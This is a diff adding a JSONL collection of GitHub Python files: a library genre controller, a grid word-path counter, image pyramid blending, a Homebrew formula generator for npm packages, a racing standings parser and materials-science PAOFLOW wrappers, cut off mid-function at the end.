diff --git "a/4286.jsonl" "b/4286.jsonl" new file mode 100644--- /dev/null +++ "b/4286.jsonl" @@ -0,0 +1,166 @@ +{"seq_id":"4475825159","text":"from entidade.genero import Genero\nfrom limite.tela_genero import TelaGenero\nfrom persistencia.genero_dao import GeneroDAO\n\nclass ControladorGenero: \n\n def __init__(self, controlador_livro): \n self.__tela_genero = TelaGenero()\n self.__controlador_livro = controlador_livro\n self.__manter_tela_aberta = True\n self.__dao = GeneroDAO()\n\n def naoexisteGenero(self, nome: str):\n naoexisteGenero = True\n genero_enviado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n genero_enviado = genero\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n genero_enviado = novo_genero\n \n return genero_enviado\n \n def pega_nome(self, genero: Genero):\n nome = genero.nome\n return nome\n\n def alterar_genero_livro(self):\n naoexisteGenero = True\n nome = self.__tela_genero.altera_genero_livro()\n\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n novo_genero = genero\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n\n return novo_genero\n\n def abrir_tela_genero(self):\n self.__manter_tela_aberta = True\n lista_opcoes = {'Cadastrar Genero': self.cadastrar_genero, 'Alterar Genero': self.alterar_genero, 'Listar Generos': self.listar_generos, 'Remover Genero': self.remover_genero, 'Pesquisar Generos': self.pesquisar_generos, 'Voltar': self.fechar_tela_genero}\n while self.__manter_tela_aberta:\n opcao_escolhida = self.__tela_genero.menu_genero()\n try:\n funcao_escolhida = lista_opcoes[opcao_escolhida]\n except Exception:\n self.__tela_genero.aviso_erro()\n else:\n funcao_escolhida() \n\n self.__controlador_livro.abrir_tela_livro()\n\n def cadastrar_genero(self):\n naoexisteGenero = True\n nome = self.__tela_genero.cadastra_genero()\n \n if nome != None:\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n naoexisteGenero = False\n break\n if naoexisteGenero:\n novo_genero = Genero(nome)\n self.__dao.add(novo_genero)\n \n self.abrir_tela_genero()\n\n def alterar_genero(self):\n existeGenero = False\n genero_alterado = self.__tela_genero.altera_genero()\n genero_encontrado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == genero_alterado:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n novo_nome = self.__tela_genero.alteracao()\n if novo_nome != None:\n self.__controlador_livro.sincronia_genero(genero_encontrado, novo_nome) \n genero_encontrado.nome = novo_nome\n else:\n self.abrir_tela_genero()\n \n self.abrir_tela_genero()\n\n def listar_generos(self):\n generos = []\n\n for genero in self.__dao.get_all():\n generos.append(genero.nome)\n\n genero_escolhido = self.__tela_genero.lista_generos(generos)\n \n if genero_escolhido == 'Voltar':\n self.abrir_tela_genero()\n\n def mostrar_genero(self, genero_escolhido):\n existeGenero = False \n dados_genero = {}\n genero_encontrado = None\n\n for genero in self.__dao.get_all():\n if genero.nome == genero_escolhido:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n nome = genero_encontrado.nome\n dados_genero = {'nome': nome}\n self.__tela_genero.mostra_genero(dados_genero)\n \n self.abrir_tela_genero()\n \n def remover_genero(self):\n existeGenero = False\n nome = self.__tela_genero.remove_genero()\n genero_encontrado = None\n\n if nome != None:\n for genero in self.__dao.get_all():\n if genero.nome == nome:\n existeGenero = True\n genero_encontrado = genero\n break\n if existeGenero:\n self.__controlador_livro.remove_genero(nome)\n self.__dao.remove(genero_encontrado)\n else:\n self.__tela_genero.aviso_erro()\n\n self.abrir_tela_genero() \n\n def pesquisar_generos(self):\n self.__manter_tela_aberta = True\n lista_opcoes = {'Pesquisar Livros do Genero': self.pesquisar_titulo, 'Pesquisar Autores do Genero': self.pesquisar_autores, 'Voltar': self.fechar_tela_genero}\n while self.__manter_tela_aberta:\n opcao_escolhida = self.__tela_genero.pesquisa_generos()\n try:\n funcao_escolhida = lista_opcoes[opcao_escolhida]\n except Exception:\n self.__tela_genero.aviso_erro()\n else:\n funcao_escolhida() \n\n self.abrir_tela_genero()\n \n def pesquisar_titulo(self):\n self.__controlador_livro.pesquisar_genero_livros()\n\n def pesquisar_autores(self):\n self.__controlador_livro.pesquisar_genero_autores()\n\n def fechar_tela_genero(self):\n self.__manter_tela_aberta = False\n\n def genero_deletado(self):\n nome = 'Autor Deletado'\n genero_deletado = Genero(nome)\n\n return genero_deletado\n","repo_name":"Sirgubler/Trabalho_DSOO","sub_path":"controle/controlador_genero.py","file_name":"controlador_genero.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"26416823682","text":"import time\r\ncord = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\r\n\r\n\r\ndef main():\r\n\t# global path\r\n\t# global count\r\n\t# global matrix\r\n\t# global inform0\r\n\t# global inform1\r\n\t# global inform\r\n\t# global path_char\r\n\tpath_size = int(input())\r\n\r\n\tstart_time = time.time()\r\n\tpath = input()\r\n\tpath_char = {}\r\n\r\n\tmatrix = []\r\n\tfor i in range(8):\r\n\t\tmatrix.append(input())\r\n\r\n\tfor index in range(len(path)):\r\n\t\tif path[index] in path_char:\r\n\t\t\tpath_char[path[index]].append(index)\r\n\t\telse:\r\n\t\t\tpath_char[path[index]] = [index]\r\n\t# print(path_char)\r\n\r\n\tcount = 0\r\n\t# Making list of paths(set of coordinates) at every block of inform matrix\r\n\tinform = [[{} for i in range(8)] for j in range(8)]\r\n\tinform0 = [[[] for i in range(8)] for j in range(8)]\r\n\tinform1 = [[[] for i in range(8)] for j in range(8)]\r\n\r\n\tfor i in range(8):\r\n\t\tfor j in range(8):\r\n\t\t\tif matrix[i][j] in path_char:\r\n\t\t\t\t# print('for i and j:', i, j)\r\n\t\t\t\tfor num in range(8):\r\n\t\t\t\t\tx = i + cord[num][0]\r\n\t\t\t\t\ty = j + cord[num][1]\r\n\t\t\t\t\tif 0 <= x < 8 and 0 <= y < 8:\r\n\t\t\t\t\t\tif matrix[x][y] in path_char:\r\n\t\t\t\t\t\t\t# print('in bound x,y:', x, y)\r\n\t\t\t\t\t\t\t# print('38:', 'matchar:', matrix[x][y],'returned list of index', path_char.get(matrix[x][y]))\r\n\t\t\t\t\t\t\tfor index in path_char[matrix[i][j]]:\r\n\t\t\t\t\t\t\t\tif index == len(path) - 1:\r\n\t\t\t\t\t\t\t\t\tcontinue # Need to put break\r\n\t\t\t\t\t\t\t\t# print('Inner index:', index, 'from', path_char[matrix[i][j]])\r\n\t\t\t\t\t\t\t\tfor outer_index in path_char[matrix[x][y]]:\r\n\t\t\t\t\t\t\t\t\t# print('Outer Index:', outer_index, 'from', path_char[matrix[x][y]])\r\n\t\t\t\t\t\t\t\t\tif outer_index == index + 1:\r\n\t\t\t\t\t\t\t\t\t\t# print(\"Yes I'm in.\")\r\n\t\t\t\t\t\t\t\t\t\t# print('Inform:', i, j, inform[i][j])\r\n\t\t\t\t\t\t\t\t\t\tif index in inform[i][j]:\r\n\t\t\t\t\t\t\t\t\t\t\tinform[i][j][index].append((x, y))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tinform[i][j][index] = [(x, y)]\r\n\t\t\t\t\t\t\t\t\t\t# print('Inform:', i, j, inform[i][j])\r\n\t\t\t\t\t\t\t\t\t\tbreak\r\n\t# print(inform)\r\n\r\n\talternate = False\r\n\t# parent_index = 0\r\n\tfor index in range(path_size):\r\n\t\tfor i in range(8):\r\n\t\t\tfor j in range(8): # index-1 is parent index(inner index)\r\n\t\t\t\tif index in path_char.get(matrix[i][j], []):\r\n\t\t\t\t\t# print('for i and j:', i, j, 'index:', index)\r\n\t\t\t\t\tif index is 0 and 0 in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][0]:\r\n\t\t\t\t\t\t\tinform0[outer_cord[0]][outer_cord[1]].append({(i, j)})\r\n\t\t\t\t\t\t\t# print('for i and j:', i, j, 'index:', index, 'outer_cord:', outer_cord)\r\n\t\t\t\t\telif index < path_size-2 and index in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][index]:\r\n\t\t\t\t\t\t\tif alternate:\r\n\t\t\t\t\t\t\t\tfor current_path in inform0[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tano = current_path.copy()\r\n\t\t\t\t\t\t\t\t\t\tano.add((i, j))\r\n\t\t\t\t\t\t\t\t\t\tinform1[outer_cord[0]][outer_cord[1]].append(ano)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfor current_path in inform1[i][j]:\r\n\t\t\t\t\t\t\t\t\t# print(current_path)\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tano = current_path.copy()\r\n\t\t\t\t\t\t\t\t\t\tano.add((i, j))\r\n\t\t\t\t\t\t\t\t\t\tinform0[outer_cord[0]][outer_cord[1]].append(ano)\r\n\t\t\t\t\t\t\t\t\t\t# print(\"Inside for Loop\", 'Index:', index, 'cord', (x, y), inform0[x][y])\r\n\t\t\t\t\telif index in inform[i][j]:\r\n\t\t\t\t\t\tfor outer_cord in inform[i][j][index]:\r\n\t\t\t\t\t\t\tif alternate:\r\n\t\t\t\t\t\t\t\tfor current_path in inform0[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tcount += 1\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tfor current_path in inform1[i][j]:\r\n\t\t\t\t\t\t\t\t\tif (outer_cord[0], outer_cord[1]) not in current_path:\r\n\t\t\t\t\t\t\t\t\t\tcount += 1\r\n\t\t# for iter in range(8):\r\n\t\t# \tprint('index: ', index, 'Row:', iter, inform1[iter]) if alternate else print('index: ', index, 'Row:', iter, inform0[iter])\r\n\t\tif alternate:\r\n\t\t\tinform0 = [[[] for i in range(8)] for j in range(8)]\r\n\t\telse:\r\n\t\t\tinform1 = [[[] for i in range(8)] for j in range(8)]\r\n\t\talternate = not alternate\r\n\r\n\t# Here information matrix is created\r\n\t# for\r\n\r\n\tprint(count)\r\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n\r\n'''\r\n3\r\nfit\r\nfitfpoke\r\norlignom\r\nifefmart\r\ntforarts\r\ntekkenth\r\nrichieri\r\ntintinti\r\npikachup\r\n\r\n3\r\nfit\r\nfitfpoke\r\norlignom\r\nifefmirt\r\ntforarfs\r\ntekkenth\r\nrichieri\r\ntintinti\r\npikachup\r\n\r\n8\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\naaaaaaaa\r\n\r\n___\r\n4 a's\r\n14196\r\n--- 0.01604151725769043 seconds ---\r\n5 a's\r\n77016\r\n--- 0.08420968055725098 seconds ---\r\n6 a's\r\n408764\r\n--- 0.47322750091552734 seconds ---\r\n7 a's\r\n2129440\r\n--- 3.296757459640503 seconds ---\r\n___\r\n8-as\r\n10899404\r\n--- 15.309681177139282 seconds ---\r\n\r\n'''","repo_name":"VivekKrG/Python-3-Practice-Problems-and-Solutions","sub_path":"Jio code Gladitor TechGig/dec improved 3.py","file_name":"dec improved 3.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41823572723","text":"import imageio\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.transform import pyramid_reduce, pyramid_expand\nimport cv2\nfrom packaging import version\nimport skimage\n\ndef plot_pyramid(pyramid):\n \"\"\"\n Create and plot a stitched image of a pyramid\n\n Args:\n pyramid : Pyramid array to be plotted\n \"\"\"\n# if(pyramid[0].shape[0] < pyramid[len(pyramid)-1].shape[0]):\n# pyramid = pyramid[::-1]\n rows, cols, dim = pyramid[0].shape\n composite_image = np.zeros((rows, cols + cols // 2, 3), dtype=np.double)\n composite_image[:rows, :cols, :] = pyramid[0]\n\n i_row = 0\n for p in pyramid[1:]:\n n_rows, n_cols = p.shape[:2]\n composite_image[i_row:i_row + n_rows, cols:cols + n_cols] = p\n i_row += n_rows\n fig, ax = plt.subplots()\n\n ax.imshow(composite_image)\n plt.show()\n\n\ndef get_gaussian_pyramid(img,downscale=2,**kwargs):\n \"\"\"\n Get the gaussian pyramid of an image\n\n Args:\n img : Image to make a laplacian pyramid off.\n Downscale (int, optional): Downscale value. Defaults to 2.\n\n Returns:\n G_pyramid: Array of gaussian pyramid images\n \"\"\"\n row = img.shape[0]\n column = img.shape[1]\n G_pyramid = []\n var = img/255\n\n while row > 8 and column > 8:\n G_pyramid.append(var)\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n var = pyramid_reduce(var, downscale=downscale, multichannel=True) \n else: \n var = pyramid_reduce(var, downscale=downscale, channel_axis=2)\n row = row/2\n column = column/2\n G_pyramid.append(var)\n return G_pyramid\n\n\ndef get_laplacian_pyramid(img,upscale=2, **kwargs):\n \"\"\"\n Get the laplacian pyramid from an image's gaussian pyramid or the image itself\n\n Args:\n img : Image to make a laplacian pyramid off.\n upscale (int, optional): Upscale value for gaussian pyramid. Defaults to 2.\n\n Returns:\n L_pyramid: Array of laplacian pyramid images\n \"\"\"\n pyramid = get_gaussian_pyramid(img,upscale=upscale)\n L_pyramid = []\n for i in range(len(pyramid)-1,-1,-1):\n if i == len(pyramid)-1:\n L_pyramid.append(pyramid[i])\n else:\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n prev = pyramid_expand(pyramid[i+1],upscale=upscale, multichannel=True) \n else: \n prev = pyramid_expand(pyramid[i+1],upscale=upscale, channel_axis=2)\n L_pyramid.append(cv2.resize(pyramid[i],dsize=(prev.shape[1],prev.shape[0]),interpolation=cv2.INTER_CUBIC)-prev)\n L_pyramid=L_pyramid[::-1]\n return L_pyramid\n\ndef reconstruct_image_from_laplacian_pyramid(pyramid):\n \"\"\"\n Reconstruct an image from its laplacian pyramid\n\n Args:\n pyramid : Laplacian pyramid to be reconstructed\n\n Returns:\n R[len(R)-1]: The reconstructed image from the laplacian pyramid\n \n \"\"\"\n R = []\n #loop through the pyramid from the bottom to the top\n for i in range(len(pyramid)-1,-1,-1):\n if i == len(pyramid)-1:\n R.append(pyramid[len(pyramid)-1])\n else:\n #Rescale -> vanaf versie skimage v0.19 is multichannel veranderd naar channel_axis\n if version.parse(skimage.__version__) < version.parse(\"0.19.0\"): # elke foto toegevoegd aan ims array\n prev = pyramid_expand(R[len(pyramid)-2-i], multichannel=True) \n else: \n prev = pyramid_expand(R[len(pyramid)-2-i], channel_axis=2)\n R.append(cv2.resize(pyramid[i],dsize=(prev.shape[1],prev.shape[0]),interpolation=cv2.INTER_CUBIC)+prev)\n return R[len(R)-1]\n\n\ndef pyramid_blend(gmask,limg1,limg2):\n \"\"\"\n Blend 2 laplacian pyramid images using gmask (gaussian pyramid mask)\n\n Args:\n gmask Gaussian pyramid: Gaussian pyramid of mask\n limg1 Laplacian pyramid: laplacian pyramid of 1st image \n limg2 Laplacian pyramid: laplacian pyramid of 2nd image\n\n Returns:\n image array: Blended image\n \"\"\"\n\n blend = []\n\n for i in range(0,len(gmask)):\n gmaskT = cv2.resize(gmask[i],dsize=(limg1[i].shape[1],limg1[i].shape[0]),interpolation=cv2.INTER_CUBIC)\n blend.append(((1-gmaskT)*limg1[i])+(gmaskT*limg2[i]))\n blended = reconstruct_image_from_laplacian_pyramid(blend)\n\n return blended\n\nif __name__ == \"__main__\":\n image_folder = \"././imgs/faces/\"\n img_name = \"superman.jpg\"\n img = imageio.imread(image_folder+img_name)\n plt.figure()\n plt.imshow(img)\n plt.show()\n\n plot_pyramid(get_gaussian_pyramid(img))\n plot_pyramid(get_laplacian_pyramid(img))\n plt.imshow(reconstruct_image_from_laplacian_pyramid(get_laplacian_pyramid(img)))\n plt.show()","repo_name":"michielgoethals/digital_image_processing","sub_path":"Opdrachten/Geometric Transformations/pyramidBlending.py","file_name":"pyramidBlending.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"19831768110","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\nfrom .package import Package\nfrom .util import logger, formula_path, turn_on_debug_logging\nfrom .version import __version__\n\n\ndef main():\n description = \"\"\"\\\n Generate a Homebrew formula for an npm package. By default the\n generated formula is printed to stdout. If -w, --write is specified,\n the formula is directly written to the specified tap, or\n homebrew/core if no tap is specified.\n \"\"\"\n parser = argparse.ArgumentParser(prog=\"noob\", description=description)\n add = parser.add_argument\n add(\"package\", help=\"name of the package on npm\")\n add(\n \"-w\",\n \"--write\",\n action=\"store_true\",\n help=\"write to filesystem instead of stdout\",\n )\n add(\n \"-t\",\n \"--tap\",\n default=\"homebrew/core\",\n help=\"if writing to filesystem, write to this tap instead of homebrew/core\",\n )\n add(\"-v\", \"--version\", action=\"version\", version=__version__)\n add(\"--debug\", action=\"store_true\")\n args = parser.parse_args()\n\n debug = args.debug\n if debug:\n turn_on_debug_logging()\n\n try:\n if args.write:\n path = formula_path(args.tap, args.package)\n\n package = Package(args.package)\n if args.write:\n with open(path, \"w\") as fp:\n fp.write(package.formula)\n print(\"Formula written to %s\" % path)\n else:\n sys.stdout.write(package.formula)\n except Exception as e:\n logger.error(\"%s: %s\", type(e).__name__, e)\n if debug:\n raise\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zmwangx/homebrew-npm-noob","sub_path":"noob/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"56"} +{"seq_id":"7919199948","text":"'''\r\nCreated on Apr 29, 2017\r\n \r\n@author: Ernesto\r\n \r\nThis module can currently collect the names and finishing positions from a NR2003 export file\r\nTo add:\r\nMulti-race support -- Added\r\nPoints calculator\r\nStandings rank and output\r\nIndication of laps led -- Added?\r\nLoad from a file (probably better for a different module)\r\n'''\r\n \r\n \r\nimport sys\r\nfrom pathlib import Path\r\n \r\n \r\nclass Driver():\r\n def __init__(self, name, finishes, number, led):\r\n self.name = name\r\n self.finishes = finishes\r\n self.number = number\r\n self.points = 0\r\n #This list should be values of 0/1/2 for every race\r\n #0 = no laps led, 1 = laps led, 2 = most laps led\r\n self.led = led\r\n \r\n \r\n \r\n \r\n \r\n \r\ndef standings_single_race(standings, race_file, game_dir):\r\n #\r\n f = open(race_file , mode = 'r')\r\n fcontent = f.readlines()\r\n \r\n def get_finish_order(fcontent, n):\r\n if \"OFFICIAL STANDINGS\" in fcontent[n]:\r\n return fcontent[n:]\r\n else:\r\n return get_finish_order(fcontent, n + 1) \r\n \r\n def remove_penalties(fcontent, n):\r\n #This barely works, but it works\r\n if \"PENALTIES\" in fcontent[n]:\r\n \r\n return fcontent[:n + 16]\r\n else:\r\n \r\n return remove_penalties(fcontent, n + 1) \r\n \r\n sys.setrecursionlimit(2000)\r\n fcontent = get_finish_order(fcontent, 0)\r\n fcontent = remove_penalties(fcontent, 0)\r\n \r\n \"\"\"\r\n parser = HTMLDrivers()\r\n parser.feed(\"\".join(fcontent))\r\n \"\"\"\r\n \r\n raceresults = []\r\n \r\n for i in range(0, len(fcontent)):\r\n #Driver\r\n if \" 0:\r\n raceresults.append(\"1\")\r\n except:\r\n if \"*\" in fcontent[i + 1]:\r\n raceresults.append('2')\r\n \r\n \r\n \r\n raceresults = raceresults[3:-2]\r\n \r\n \r\n \r\n for j in range(0, len(raceresults) - 3):\r\n d = Driver(number = raceresults[j + 1].strip(), finishes = [raceresults[j].strip()], name = raceresults[j + 2].strip(), led = [raceresults[j + 3]])\r\n try:\r\n int(d.name)\r\n continue\r\n except:\r\n if d.name == 'LAP' or d.name == 'INFRACTION':\r\n continue\r\n pass\r\n \r\n \r\n d_exists = False\r\n \r\n \r\n for k in standings:\r\n \r\n if k.name == d.name and k.number == d.number:\r\n k.finishes.append(d.finishes[0])\r\n k.led.append(d.led[0])\r\n d_exists = True\r\n break\r\n \r\n \r\n if not d_exists:\r\n standings.append(d)\r\n \r\n \r\n return standings","repo_name":"ernesto241/NR2003-Points-Calculator","sub_path":"nr2003_standings_update.py","file_name":"nr2003_standings_update.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3427881867","text":"import AFLOWpi.prep\nimport os\nimport numpy as np \nimport re\nimport itertools\nimport shutil\nimport glob\nimport subprocess as sp\n\ndef _run_paopy(oneCalc,ID,acbn0=False,exec_prefix=\"\"):\n \n paopy_path = os.path.join(AFLOWpi.__path__[0],'PAOFLOW/examples/','main.py')\n\n try:\n shutil.copy(paopy_path,oneCalc['_AFLOWPI_FOLDER_'])\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. Exiting.\") \n raise SystemExit\n\n paopy_path = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'main.py')\n\n if exec_prefix==\"\":\n\n if acbn0:\n execPrefix = AFLOWpi.prep._ConfigSectionMap('run','exec_prefix_serial')\n else:\n execPrefix = AFLOWpi.prep._ConfigSectionMap(\"run\",\"exec_prefix\")\n\n else:\n execPrefix=exec_prefix\n\n paopy_output = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'%s_PAOFLOW.out'%ID)\n\n py_comm = AFLOWpi.prep._ConfigSectionMap('run','python_command')\n if py_comm==\"\":\n py_comm=\"python\"\n\n\n paopy_input = '%s inputfile.xml'%oneCalc['_AFLOWPI_FOLDER_']\n try:\n command = '%s %s -u %s %s > %s %s' % (execPrefix,py_comm,paopy_path,paopy_input,paopy_output,\n acbn0)\n print(command)\n\n\n proc = sp.run(command,shell=True)\n\n return_code = proc.returncode\n\n if return_code!=0:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. Exiting.\") \n raise SystemExit\n\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n AFLOWpi.run._fancy_error_log(\"PAOFLOW did mot run properly. Exiting.\") \n raise SystemExit\n\ndef PAOFLOW_DATA_CONV(oneCalc,ID):\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID,-1) \n except: pass\n try:\n AFLOWpi.prep._convert_tb_pdos(oneCalc,ID,1) \n except: pass\n try:\n AFLOWpi.prep._combine_pol_pdos(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.scfuj._rename_boltz_files(oneCalc,ID)\n except: pass\n try:\n AFLOWpi.scfuj._rename_hall_files(oneCalc,ID) \n except: pass\n try:\n AFLOWpi.scfuj._rename_bands_files(oneCalc,ID)\n except: pass\n\n\ndef paopy_header_wrapper(calcs,shift_type=1,shift='auto',thresh=0.90,tb_kp_mult=4,smearing=None,emin=-5.0,emax=5.0,ne=1000,symmetrize=False,sym_thr=1.e-6,sym_max_iter=20):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_header(oneCalc,ID,shift_type=%s,shift='auto',thresh=%s,tb_kp_mult=%s,smearing=%s,emin=%s,emax=%s,ne=%s,symmetrize=%s,sym_thr=%s,sym_max_iter=%s)\"\"\" % (shift_type,thresh,tb_kp_mult,repr(smearing),emin,emax,ne,symmetrize,sym_thr,sym_max_iter)\n \n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_spin_Hall_wrapper(calcs,s_tensor,spin_texture=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_spin_Hall(oneCalc,ID,%s,spin_texture=%s)\"\"\"%(repr(s_tensor),spin_texture)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\ndef paopy_Berry_wrapper(calcs,a_tensor):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_Berry(oneCalc,ID,%s)\"\"\"%repr(a_tensor)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_dos_wrapper(calcs,fermi_surf=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_dos(oneCalc,ID,fermi_surf=%s)\"\"\"%fermi_surf\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\n\ndef paopy_pdos_wrapper(calcs):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_pdos(oneCalc,ID)\"\"\"\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_bands_wrapper(calcs,band_topology=True,fermi_surface=False,ipol=0,jpol=1,spol=2,nk=1000):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_bands(oneCalc,ID,topology=%s,ipol=%s,jpol=%s,spol=%s,nk=%s)\"\"\"%(band_topology,ipol,jpol,spol,nk)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\ndef paopy_transport_wrapper(calcs,t_tensor,t_min,t_max,t_step,carr_conc=False):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_transport(oneCalc,ID,%s,t_min=%s,t_max=%s,t_step=%s,carr_conc=%s)\"\"\"%(repr(t_tensor),t_min,t_max,t_step,carr_conc)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\n\n\ndef paopy_optical_wrapper(calcs,d_tensor):\n command=\"\"\" AFLOWpi.scfuj._add_paopy_optical(oneCalc,ID,%s)\"\"\"%repr(d_tensor)\n AFLOWpi.prep.addToAll_(calcs,'PAOFLOW',command)\n\n\ndef paopy_acbn0_wrapper(calcs):\n pass\n\n\n\n\n\ndef _add_paopy_xml(filename,var_name,var_type,var_val,degree=0): \n\n with open(filename,'r') as ifo: \n lines=ifo.readlines()\n \n var_size=1\n if degree==2:\n tensor = '\\t<%s>\\n'%var_name\n for i in range(len(var_val)):\n tensor+='\\t\\t%s\\n'%(var_type,len(var_val[i]),' '.join(map(str,var_val[i])))\n tensor+=\"\\t\"%var_name\n lines[-1]=tensor \n elif degree==1:\n var_size = len(var_val)\n var_val = ' '.join(map(str,var_val))\n lines[-1]='\\t<%s>%s'%(var_name,var_type,var_size,var_val,var_name) \n else:\n lines[-1]='\\t<%s type=\"%s\" size=\"%s\">%s'%(var_name,var_type,var_size,var_val,var_name) \n lines.extend(['\\n']) \n outstr = ''.join(lines) \n with open(filename,'w') as ofo: \n ofo.write(outstr)\n\n\ndef _add_paopy_header(oneCalc,ID,shift_type=1,shift='auto',thresh=0.90,tb_kp_mult=4,acbn0=False,ovp=False,smearing=None,emin=-5.0,emax=5.0,ne=1000,symmetrize=False,sym_thr=1.e-6,sym_max_iter=20):\n \n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n ibrav=oneCalc['_AFLOWPI_ORIG_IBRAV_']\n \n nk1,nk2,nk3 = AFLOWpi.scfuj._mult_kgrid(oneCalc,mult=tb_kp_mult)\n\n blank = '''\n\n'''\n\n with open(paopy_input,'w') as ifo:\n ifo.write(blank)\n \n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'fpath','character','%s_TB.save'%ID)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'smearing','character',smearing)\n\n if shift==\"auto\":\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift','character',\"auto\")\n else:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift','decimal',shift)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'shift_type','int',shift_type)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ibrav','int',ibrav)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'pthr','decimal',thresh)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'verbose','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'npool','int',1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'delta','decimal',0.1)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ne','int',ne)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emin','decimal',emin)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emax','decimal',emax)\n\n\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'double_grid','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft1','int',nk1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft2','int',nk2)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nfft3','int',nk3)\n\n if symmetrize:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symmetrize','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symm_max_iter','int',sym_max_iter)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'symm_thresh','decimal',\"%6.4e\"%sym_thr)\n\n\n if acbn0==True:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'expand_wedge','logical','F')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'write2file','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'write_binary','logical','T')\n if ovp==True:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'non_ortho','logical','T')\n\ndef 